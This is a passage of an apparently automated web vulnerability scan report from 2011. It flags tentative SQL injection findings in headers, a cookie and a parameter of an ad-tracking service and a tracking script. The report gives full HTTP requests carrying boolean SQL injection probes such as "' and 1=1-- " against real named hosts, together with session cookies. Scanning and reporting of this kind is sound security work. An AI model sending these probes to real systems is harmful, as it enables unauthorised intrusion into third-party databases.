Content-Length: 3683
Connection: keep-alive

ot_d=document;ot_un="undefined";
if(typeof otgoal!==ot_un){ot_goal=escape(otgoal);if(ot_goal.indexOf('%u')!=-1)ot_goal=escape(ot_goal);ot_goal='&otgoal='+ot_goal;}else ot_goal='';
if(typeof otclv!==ot_un)ot_clv='&otclv='+otclv;else ot_clv='';
ot_b="http"+(ot_d.URL.indexOf('https:')==0?'s://':'://')+'a02.opentracker.net';
if(typeof(top.document)=="object") ot_r=top.document;else ot_r=ot_d;
ot_c=ot_r;
ot_cd=(new Date("December 31, 2023")).toGMTString();ot_cld=new Date();ot_fv=false;ot_ac=false;
if (typeof ot_ti===ot_un) {
ot_ti=ot_d.title;
}
ot_ti=escape(ot_ti);if (ot_ti.indexOf('%u')!=-1) ot_ti=escape(ot_ti);
ot_mj=parseInt(navigator.appVersion);if(ot_mj>=5){if(ot_d.referrer.indexOf(ot_r.location.hostname)==-1)ot_r=ot_d;}else{ot_r=document;}
if(ot_c.cookie.indexOf('machine-id')!=-1)ot_ac=true;else{
if(ot_c.cookie.indexOf('machine-id')==-1) f_sc("machine-id","173.193.214.243:1308222969806",ot_cd,"/");
if(ot_c.cookie.indexOf('machine-id')!=-1)ot_ac=true;
}
ot_rc=f_rc("machine-id");ot_lc=escape((typeof ot_url===ot_un)?ot_d.location:ot_url);ot_t0=1308222969806;

function f_log() {
ot_im=new Image(1,1);
ot_im.src=ot_b+'/collect.jsp?p=1&mid='+ot_rc
+'&fv='+ot_fv+'&ti='+ot_ti+'&si=nicusa.com18703088' or 1=1-- '
+ot_goal+ot_clv
+'&sh='+screen.height+'&sw='+screen.width
+'&sc='+screen.pixelDepth+ot_goal+ot_clv
+'&lc='+ot_lc+'&ref='+escape(ot_r.referrer)
+'&t0='+ot_t0;
}

function f_sc(n,v,h,p,d,s){
ot_fv=true;ot_c.cookie=n+'='+escape(v)+((h)?(';expires='+h):'')+((p)?';path='+p:'')+((d)?';domain='+d:'')+((s && (s==true))?'; secure':'');
}

function f_rc(n){
if(ot_c.cookie=='')return false;else{
var fc,lc;var tbc=ot_c.cookie;fc=tbc.indexOf(n);var NN2Hack=fc+n.length;
if((fc != -1) && (tbc.charAt(NN2Hack)=='=')){
fc += n.length+1;lc=tbc.indexOf(';',fc);
if(lc==-1)lc=tbc.length;return unescape(tbc.substring(fc,lc));
}else{return false;}
}
}

function ot_f(e) {
et=e.target;
ot_o=et;
if (ot_o.caught==true)
...[SNIP]...

Request 2

GET /?site=nicusa.com18703088'%20or%201%3d2--%20 HTTP/1.1
Host: script.footprintlive.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 16 Jun 2011 11:16:10 GMT
Server: Apache-Coyote/1.1
Content-Length: 1
Connection: keep-alive



1.15. http://tap.rubiconproject.com/oz/sensor [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,please+respect:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+42:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=21|4|17|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%262374%3D1; rdk2=0; ses2=11953^6; csi2=3187870.js^5^1308226504^1308228061&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^11; csi15=3187871.js^8^1308225219^1308228064&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:14:02 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:14:02 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:14:02 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,please+respect:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+42:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=21|4|17|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%262374%3D1; rdk2=0; ses2=11953^6; csi2=3187870.js^5^1308226504^1308228061&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^11; csi15=3187871.js^8^1308225219^1308228064&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:14:02 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.16. http://tap.rubiconproject.com/oz/sensor [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=87&k=southern+union:328,energy+transfer:288,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:122,energy:112,billion+cnbc:80,southern:72,transfer:72,datetime+11:72,union:72,must+click:64,please+respect:64,cnbc+welcomes:64,cnbc+reserves:64,posted+yet:64,cnbc+highlights:64,related+links:64,2011:56,asia+pacific:56,datetime+6:48,2011+11:48,16+2011:48,11+06:48,6+16:48,special+reports:48,expiration+datetime:48,datetime:46,billion:46,energy+news:40,burgeoning+u:40,union+company:40,will+buy:40,transfer+equity:40,large+midstream:40,midstream+company:40,will+benefit:40,transfer+partners:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24'%20and%201%3d1--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; cd=false; dq=75|4|71|0; csi2=1300433.js^27^1308237983^1308247606&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; csi15=1300434.js^29^1308237982^1308247605&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; ses2=11953^63; rdk=6451/11953; ses15=11953^72

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 18:07:58 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 18:06:06 GMT; Path=/
Set-Cookie: dq=77|4|73|0; Expires=Fri, 15-Jun-2012 18:06:06 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=87&k=southern+union:328,energy+transfer:288,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:122,energy:112,billion+cnbc:80,southern:72,transfer:72,datetime+11:72,union:72,must+click:64,please+respect:64,cnbc+welcomes:64,cnbc+reserves:64,posted+yet:64,cnbc+highlights:64,related+links:64,2011:56,asia+pacific:56,datetime+6:48,2011+11:48,16+2011:48,11+06:48,6+16:48,special+reports:48,expiration+datetime:48,datetime:46,billion:46,energy+news:40,burgeoning+u:40,union+company:40,will+buy:40,transfer+equity:40,large+midstream:40,midstream+company:40,will+benefit:40,transfer+partners:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24'%20and%201%3d2--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; cd=false; dq=75|4|71|0; csi2=1300433.js^27^1308237983^1308247606&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; csi15=1300434.js^29^1308237982^1308247605&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; ses2=11953^63; rdk=6451/11953; ses15=11953^72

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 18:07:58 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.17. http://tap.rubiconproject.com/oz/sensor [cd cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The cd cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false'%20and%201%3d1--%20; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:10:17 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:10:17 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:10:17 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false'%20and%201%3d2--%20; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:10:17 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.18. http://tap.rubiconproject.com/oz/sensor [cd parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The cd parameter appears to be vulnerable to SQL injection attacks. The payloads 12779497'%20or%201%3d1--%20 and 12779497'%20or%201%3d2--%20 were each submitted in the cd parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false12779497'%20or%201%3d1--%20&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:16 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:11:16 GMT; Path=/
Set-Cookie: dq=46|4|42|0; Expires=Fri, 15-Jun-2012 15:11:16 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
